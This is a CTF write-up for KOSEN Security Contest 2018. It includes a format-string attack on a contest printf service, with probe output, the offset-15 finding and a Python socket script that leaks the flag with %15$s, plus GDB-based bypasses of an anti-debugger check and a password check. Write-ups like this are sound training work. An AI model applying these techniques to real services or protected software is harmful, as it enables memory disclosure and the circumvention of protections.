KOSEN Security Contest 2018 Write-Up

I am writing this write-up in English for a friend who has just started doing CTFs. My English is not very good, so please bear with me.

KOSEN Security Contest 2018 was held from September 1st to 2nd. It's a CTF for Kosen students. 

I entered the contest with my laboratory members and my juniors. Our team name is 074m4K053n, and the team finished in 3rd place (3rd / 36 teams).

I solved the following questions.

  • [Sample] 100 Sample
  • [Binary] 100 printf
  • [Binary] 200 XOR, XOR
  • [Binary] 250 Simple anti debugger
  • [Network] 150 Login and Get flag
  • [Web] 100 Steal a information from Server
  • [Web] 300 Steal a account
  • [Misc] 50 I don't wanna see HITO OOSUGI
  • [Misc] 100 No disc space

I'll explain each of these questions below.

00 [Sample] 100 Sample


[Question]

CTF is a competition in which you find answers called "flags".

The flag format is SCKOSEN{foobar}.

In order to practice, submit the current Japanese era as the flag.

example :

SHOWA (1926 - 1989) -> SCKOSEN{SHOWA}

MEIJI (1868 - 1912 ) -> SCKOSEN{MEIJI}

TAISHO (1912 - 1926) -> SCKOSEN{TAISHO}

 

[Solution]

This is the sample question.

The current Japanese era is Heisei (1989 - 2019).

So the flag is SCKOSEN{HEISEI}.

 

 

03 [Binary] 100 printf


[Question]

Steal the flag!

How to connect to the game: nc [foobar] [port] example: nc 27.133.152.42 80

 

[Solution]

Use the sample command, and you get the following strings.

$ nc 27.133.152.42 80
Secret is in 0xffc9a37e
What do you want: 

Type "Earth" and you get the following strings.

$ nc 27.133.152.42 80
the secret is in 0xffc9a37e
what do you want: Earth
there is no Earth

Type "AAAA,%p,%p,%p,%p,%p,%p" (I actually sent 20 of them) and you get

the secret is in 0xff985c6e
what do you want: AAAA,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p
there is no AAAA,0x100,0xf7ed65c0,(nil),(nil),(nil),(nil),0x43530000,0x45534f4b,0x73757b4e,0x72705f65,0x66746e69,0x726f635f,0x74636572,0x7d796c,0x41414141,0x2c70252c,0x252c7025,0x70252c70,0x2c70252c,0x252c7025

As you can see from the result, we can leak a few values from memory by using %p: the input is passed to printf as the format string itself. So we can use a Format String Attack.

Let's look at the result again, one value per line (the number is the position of the %p that printed it):

AAAA, (our input, echoed back)
1: 0x100
2: 0xf7ed65c0
3: (nil)
4: (nil)
5: (nil)
6: (nil)
7: 0x43530000
8: 0x45534f4b
9: 0x73757b4e
10: 0x72705f65
11: 0x66746e69
12: 0x726f635f
13: 0x74636572
14: 0x7d796c
15: 0x41414141

We can find 0x41414141 ("AAAA" written in ASCII) at the 15th position. This 0x41414141 is the start of the string I sent, so the 15th %p argument is read from our own input buffer.

So, if we send an address instead of "AAAA" and ask printf to dereference the 15th argument as a string, we can read the value stored at that address.

 

Attack string :

{secret address}, %15$s

We can get {secret address} from the banner "the secret is in 0xff985c6e" (it changes on every connection, so the script below parses it each time).
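As an added example (my own Python 3 code, not part of the original write-up), this parses the leak line shown above: it finds the argument index of the "AAAA" marker automatically and reassembles the leaked words as little-endian bytes, which shows that the secret was already readable in the %p output before %15$s was ever sent. The leak line is copied from the output above and cut after the first 16 words; the function names are my own.

```python
import re
import struct

# Constructed input: the server's reply to "AAAA,%p,%p,...", copied from
# the output above and cut after the first 16 leaked words.
LEAK_LINE = ("there is no AAAA,0x100,0xf7ed65c0,(nil),(nil),(nil),(nil),"
             "0x43530000,0x45534f4b,0x73757b4e,0x72705f65,0x66746e69,"
             "0x726f635f,0x74636572,0x7d796c,0x41414141,0x2c70252c")

MARKER = 0x41414141  # "AAAA": the 4 bytes we placed at the start of our input


def parse_leak(line):
    """Return the list of 32-bit words printed by the %p conversions.
    glibc prints a NULL pointer as '(nil)', so that token becomes 0."""
    payload = line.split("there is no ", 1)[1]
    words = []
    for tok in payload.split(",")[1:]:      # skip the echoed "AAAA"
        words.append(0 if tok == "(nil)" else int(tok, 16))
    return words


def marker_position(words, marker=MARKER):
    """1-based index of the %p that echoed our marker, i.e. the N to use in
    a %N$s conversion (the write-up found 15 by hand). None if absent."""
    for i, w in enumerate(words, 1):
        if w == marker:
            return i
    return None


def decode_words(words):
    """Pack the leaked words as little-endian bytes (their order on the x86
    stack) and return the longest printable-ASCII run. For this leak that
    run is the secret itself: %p alone already exposed it."""
    raw = b"".join(struct.pack("<I", w) for w in words)
    runs = re.findall(rb"[\x20-\x7e]{4,}", raw)
    return max(runs, key=len).decode() if runs else ""


if __name__ == "__main__":
    words = parse_leak(LEAK_LINE)
    print("marker at argument", marker_position(words))
    print("leaked text:", decode_words(words))
```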

 

And the Python script is here :

#!/usr/bin/env python2
import socket
import struct

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('27.133.152.42', 80))
# read the banner "the secret is in 0x........" and the prompt
res = s.recv(4096)
res += s.recv(4096)
print(res)
# the 5th word of the banner is the address of the secret
addr = int(res.split()[4], 16)
#buf = "AAAA"
# send the address as 4 raw little-endian bytes instead of "AAAA";
# it becomes the 15th argument that the %p probe walked to above
buf = struct.pack("<I", addr)
#buf += ',%p' * 20
# %15$s makes printf dereference that 15th argument as a string
buf += ',%15$s'
buf += '\n'
s.send(buf)
print(buf)
res = s.recv(4096)
res += s.recv(4096)
res += s.recv(4096)
print(res)
s.close()

And the result is here (the unreadable characters are the raw address bytes):

the secret is in 0xffc0b52e
what do you want:
.���,%15$s

there is no .���,SCKOSEN{use_printf_correctly}

 

 

04 [Binary] 200 XOR, XOR

[Question]

Read the assembly and get the flag!

 

[Solution]

There is a file named "asmreading".

First, check the file with the file command.

$ file ./asmreading 

asmreading: ELF 32-bit LSB pie executable Intel 80386 ........... , not stripped

It's an ELF executable file.

Next, use the GDB debugger and disassemble the main function.

We can see the ASCII codes and xor_func. So xor_func seems to be the decode function.

To check that, set a breakpoint right after the call to xor_func and run the executable.

Then we can find the decoded flag in memory.

The flag is SCKOSEN{you_can_read_assembly}. (But I didn't read the assembly ...)

 

 

05 [Binary] 250 Simple anti debugger

[Question]

I attached to it from GDB, but it doesn't work.

How can I analyse it?

 

[Solution]

There is a file named "simple_anti_debugger".

First, check the file with the file command.

$ file ./simple_anti_debugger

asmreading: ELF 32-bit LSB pie executable Intel 80386 ........... , not stripped

It's an ELF executable file.

Next, use the GDB debugger. But I couldn't run the binary under the debugger because of the anti-debug technique.

So first, look at the function information. There is a detect_debugger function. Let's try to avoid it.

In the detect_debugger function, the eax register is compared with 0xffffff. If eax is 0xffffff, the program goes to the exit code.

To avoid it, I change the value in eax at that point.

Now we can use the debugger in the main function.

Change eax again to avoid the password check.

Then we can get the flag. The flag is SCKOSEN{I_like_debugger}.

 

 

 

I'll write up the other questions later.....

 

 
